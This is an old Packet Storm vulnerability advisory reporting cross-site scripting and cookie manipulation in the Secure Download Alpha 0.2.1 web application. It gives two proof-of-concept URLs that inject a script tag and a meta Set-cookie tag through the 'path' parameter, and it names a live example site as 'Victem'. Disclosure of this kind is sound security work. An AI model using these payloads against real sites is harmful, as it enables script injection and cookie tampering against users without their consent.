securedownload-xsscm.txt

2008-12-04T00:00:00
ID PACKETSTORM:72594
Type packetstorm
Reporter Pouya Server
Modified 2008-12-04T00:00:00

Description

                                        
                                            `#########################################################  
---------------------------------------------------------  
Portal Name: Secure Download  
Version : Alpha 0.2.1  
Vendor : http://relative.nl/projects.php?subMnuItem=2  
Author : Pouya_Server , Pouya.s3rver@Gmail.com  
Vulnerability : (XSS,CM)  
---------------------------------------------------------  
#########################################################  
[XSS]:  
http://site.com/[Path]/?path=<script>alert(1369)</script>&projects%  
  
[CM]:  
http://site.com/[Path]/?path=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&projects%  
---------------------------------  
  
Victem :  
http://relative.nl/examples/secureDownload_V0.2.1/  
`